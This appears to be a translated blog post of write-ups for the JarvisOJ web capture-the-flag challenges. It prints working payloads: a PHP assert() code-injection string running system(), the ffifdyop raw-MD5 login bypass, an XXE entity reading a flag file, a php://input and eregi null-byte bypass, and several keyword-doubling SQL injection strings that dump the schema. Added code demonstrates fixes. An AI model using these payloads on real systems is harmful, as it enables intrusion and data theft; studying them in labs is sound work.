JarvisOJ web challenge write-ups (being updated...)

babyphp

First, let's look at the page source.
Being silly, I changed the end of the URL to ?page=flag. Of course nothing shows up, but it tells us that the file flag.php exists.
I spotted GIT, thought of Git source leakage, and pulled the source with a tool written by a more experienced player.
You can see the flag.php we want; opening it, of course, gives no flag.
The check logic can be read from index.php:

<?php
if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
?>

Seeing assert(), the reflex is code execution and reading flag.php.
After several tries with reference to an expert's write-up, this nobody got the payload: ?page=flag'.system(ls).'
This puts flag'.system(ls).' into the first parameter of strpos():
$file = "templates/" . "flag'.system(ls).'" . ".php";
assert("strpos('templates/flag'.system(ls).'.php', '..') === false") or die("Detected hacking attempt!");
This lists all the files.
Then read flag.php with cat.
The flag is in the page source.
Conclusion: the code has to be spliced together correctly!

admin

No ideas; capturing the traffic showed nothing useful, so I scanned the web directory.
There really was something...
I saw the cute robots file and went in to have a look.
It hints at the page /admin_s3cr3t.php.
The flag is given directly, and I thought I'd have to keep looking.
OK, I was fooled... Wrong Answer, Wrong Answer, Wrong Answer.
Then I captured the request again and changed the value of admin.

localhost

The IP address can be forged.

PORT51

Very naively, I tried http://web.jarvisoj.com:51/.
Actually it should be accessed from a public IP with port 51 as the source port, not by changing the destination port.
On Windows this command does it:
curl --local-port 51 http://web.jarvisoj.com:32770/
But the server seemed to have a problem and didn't give the flag.

LOGIN

At first I was blind and missed the hint in the response, and even tried brute force... awkward laugh.
It was also the first time I'd heard of md5($pass, true).
For the details see https://www.freebuf.com/column/150063.html, it's written really well!
Enter ffifdyop to get the flag.
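Why the ffifdyop input works, and how a fixed query treats the same input, as an added example that is not part of the original write-up. It mimics PHP's md5($pass, true) in Python and uses an in-memory SQLite table (constructed here) as a stand-in for the challenge's MySQL database; the table and column names are assumptions.

```python
import hashlib
import sqlite3

def php_raw_md5(password: str) -> str:
    """Mimic PHP's md5($pass, true): the 16 raw digest bytes as single-byte characters.
    latin-1 maps each byte to one code point, like a PHP byte string."""
    return hashlib.md5(password.encode()).digest().decode("latin-1")

def vulnerable_sql(password: str) -> str:
    """The pattern behind the challenge: the raw digest is concatenated into the query.
    For 'ffifdyop' the digest begins with the bytes 'or'6, so the statement becomes
    ... WHERE password = ''or'6...' and the OR branch is a string with a numeric prefix."""
    return "SELECT username FROM admin WHERE password = '" + php_raw_md5(password) + "'"

def setup() -> sqlite3.Connection:
    """Constructed sample data: one account whose stored hash belongs to a password we never send."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES (?, ?)",
                 ("admin", hashlib.md5(b"correct horse battery").hexdigest()))
    return conn

def login_vulnerable(conn: sqlite3.Connection, password: str) -> list:
    """Executes the concatenated statement. SQLite, like MySQL, treats the string '6...'
    as the number 6 in a boolean context, so the WHERE clause is true for every row."""
    return [row[0] for row in conn.execute(vulnerable_sql(password))]

def login_fixed(conn: sqlite3.Connection, password: str) -> list:
    """Hardened form: hex digest (only [0-9a-f], so it can never contain a quote) bound as a
    parameter, so whatever the hash contains is compared as data, never parsed as SQL."""
    digest = hashlib.md5(password.encode()).hexdigest()
    rows = conn.execute("SELECT username FROM admin WHERE password = ?", (digest,))
    return [row[0] for row in rows]

if __name__ == "__main__":
    conn = setup()
    print(repr(vulnerable_sql("ffifdyop")))
    print("vulnerable login returns:", login_vulnerable(conn, "ffifdyop"))  # ['admin']
    print("fixed login returns:", login_fixed(conn, "ffifdyop"))            # []
```

Binding the parameter removes the injection; a real login would also replace unsalted MD5 with a proper password hash such as bcrypt.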

神盾局的秘密 (The Secret of S.H.I.E.L.D.)

Using the mighty Inspect Element, I found the image source is src="showimg.php?img=c2hpZWxkLmpwZw==", so I guessed an arbitrary file read vulnerability.
Tried reading index.php and got the source.
It should be exploited via deserialization; first look at the definition of the Shield class in shield.php.
Next is constructing the serialized field.
After my rather clumsy construction, got it~ (visible in the page source)

WEB?

When I first saw this login box I thought it was SQL injection... capturing the traffic didn't reveal any hints either.
Reading the source didn't show anything either... the experts' write-ups say the problem is in app.js.
Copy it and search in app.js.
Then look at checkpass().
A system of 25 linear equations in one variable, hahaha; working it out by hand is out of the question, so Python it is:

# Each entry is the character code checkpass() expects at that position; decode them back to the string.
data = [81,87,66,123,82,51,97,99,55,95,49,115,95,105,110,116,101,114,101,115,116,105,110,103,125]
flag = ''
for i in data:
    flag += chr(i)
print(flag)

Closing remark: I always assumed the JS in the page source wasn't worth a look; that was my ignorance.
Sorry, another blind spot in my knowledge.

api调用 (API call)

I thought it was some command injection or code injection; this is one I did by reading a write-up.
It tests an XXE vulnerability. Although I'd seen it recently, I had only read the theory and never practised.

]> references an external file

1. Capture the request and change Content-Type to application/xml.
2. Inject the XML; following the hint, use SYSTEM to view the file.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xdsec [
<!ELEMENT methodname ANY >
<!ENTITY xxe SYSTEM "/home/ctf/flag.txt" >]>
<methodcall>
<methodname>&xxe;</methodname>
</methodcall>

I found the XML code... I can't write it myself.
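A defensive handler for the methodcall format above, as an added example that is not the challenge's code: it refuses any request carrying a DOCTYPE (so no entity, internal or external, can be declared) before the document is parsed at all. The size limit, the RejectedXml class and the sample method name are this example's own assumptions.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

MAX_BODY = 64 * 1024  # assumed limit for this API; a method call needs nothing larger

class RejectedXml(ValueError):
    """Raised for any body this endpoint is not willing to parse."""

def reject_doctype(body: bytes) -> None:
    """First pass: expat decodes the document itself (so a DOCTYPE behind a different
    encoding is still seen) and we abort the moment a DOCTYPE declaration begins."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise RejectedXml("DOCTYPE not accepted: %r" % name)

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:
        raise RejectedXml("malformed XML: %s" % exc) from None

def parse_methodcall(body: bytes) -> str:
    """Return the requested method name or raise RejectedXml. Because no DTD got through,
    an &xxe;-style reference cannot resolve to anything."""
    if len(body) > MAX_BODY:
        raise RejectedXml("body too large")
    reject_doctype(body)
    root = ET.fromstring(body)
    if root.tag != "methodcall":
        raise RejectedXml("unexpected root element %r" % root.tag)
    name = root.findtext("methodname")
    if not name or not name.strip().isidentifier():
        raise RejectedXml("missing or invalid methodname")
    return name.strip()

# Two constructed requests: a benign call, and the write-up's payload re-typed as bytes.
BENIGN = b'<?xml version="1.0"?><methodcall><methodname>getFlagStatus</methodname></methodcall>'
XXE_PAYLOAD = (b'<?xml version="1.0" encoding="utf-8"?>'
               b'<!DOCTYPE xdsec [<!ELEMENT methodname ANY >'
               b'<!ENTITY xxe SYSTEM "/home/ctf/flag.txt" >]>'
               b'<methodcall><methodname>&xxe;</methodname></methodcall>')

def classify(body: bytes) -> str:
    """Wrapper returning 'ok:<name>' or 'rejected:<reason>', the string a log line would carry."""
    try:
        return "ok:" + parse_methodcall(body)
    except RejectedXml as exc:
        return "rejected:" + str(exc)
```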

In a mess

Right-click to view the source; hint: index.phps
Get the code from index.phps:

<?php
error_reporting(0);
echo "<!--index.phps-->";

if(!$_GET['id'])
{
	header('Location: index.php?id=1');
	exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
	echo 'Hahahahahaha';
	return ;
}
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
	require("flag.txt");
}
else
{
	print "work harder!harder!harder!";
}
?>

The key point is:

$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)

id is bypassed with a weak-type comparison, a with a pseudo-protocol, and b using the %00 truncation behaviour of eregi().
So the payload:

?a=php://input&id=0a&b=%004qqqqq
POST:1112 is a nice lab!

Entering the directory ?id=1, is it SQL injection?
Add a single quote and take a look; then 'and' doesn't work.
Query the database name:

?id=-1/*h*/uniunionon/*h*/seselectlect/*h*/1,2,(selselectect/*h*/context/*h*/frofromm/*h*/content)%23

Dump the table name:

?id=-1/*h*/uniunionon/*h*/seselectlect/*h*/1,2,(seselectlect/*h*/group_concat(table_name)/*h*/frofromm/*h*/information_schema.tables/*h*/where/*h*/table_schema=database())#

Dump the column names; note that the table name must be hex-encoded:

?id=-1/*h*/uniunionon/*h*/seselectlect/*h*/1,2,(seselectlect/*h*/group_concat(column_name)/*h*/frofromm/*h*/information_schema.columns/*h*/where/*h*/table_name=0x636f6e74656e74)#

Read the content:

?id=-1/*h*/uniunionon/*h*/seselectlect/*h*/1,2,(selselectect/*h*/context/*h*/frofromm/*h*/content)%23

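The doubled keywords (uniunionon, seselectlect, frofromm) and the /*h*/ comments in these payloads tell us what the challenge's filter does: it deletes blocked keywords and passes the rest on. As an added example (not the challenge's code), the Python below models that filter on the write-up's own table-name payload, shows what it leaves behind, and contrasts it with the check a defender should make instead: validate id as an integer and never rewrite input. The BLOCKED list is an inference from the payloads, not code from the challenge.

```python
import re
from urllib.parse import unquote_plus

# Keywords the challenge's filter evidently deletes: each is one the write-up doubles.
BLOCKED = ("union", "select", "from")

# The write-up's table-name payload (the value of id), reused here as sample input.
WRITEUP_PAYLOAD = ("-1/*h*/uniunionon/*h*/seselectlect/*h*/1,2,(seselectlect/*h*/group_concat(table_name)"
                   "/*h*/frofromm/*h*/information_schema.tables/*h*/where/*h*/table_schema=database())#")

def canonical(value: str) -> str:
    """Normalise before deciding anything: URL-decode, fold case, turn inline comments
    into the whitespace they stand for, squeeze runs of whitespace."""
    s = unquote_plus(value).lower()
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s).strip()

def deleting_filter(value: str) -> str:
    """What the challenge appears to do: strip each blocked keyword in one pass and forward
    the remainder to the database. Deleting 'union' from 'uniunionon' leaves 'union'."""
    s = canonical(value)
    for kw in BLOCKED:
        s = s.replace(kw, "")
    return s

def contains_blocked(value: str) -> bool:
    """A blocklist that rejects instead of rewriting. It runs on the canonical form, so the
    comment trick hides nothing, and nothing is removed, so nothing can be 'doubled'."""
    s = canonical(value)
    return any(kw in s for kw in BLOCKED)

def is_valid_id(value: str) -> bool:
    """The actual fix for a numeric id: allowlist the shape of the value. Combined with a
    parameterised query there is no filter left to evade."""
    return re.fullmatch(r"\d{1,10}", value.strip()) is not None

if __name__ == "__main__":
    print("after deleting filter :", deleting_filter(WRITEUP_PAYLOAD))
    print("rejecting blocklist   :", contains_blocked(WRITEUP_PAYLOAD))
    print("integer allowlist     :", is_valid_id(WRITEUP_PAYLOAD), is_valid_id("1"))
```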


Source: blog.csdn.net/syy0201/article/details/89032238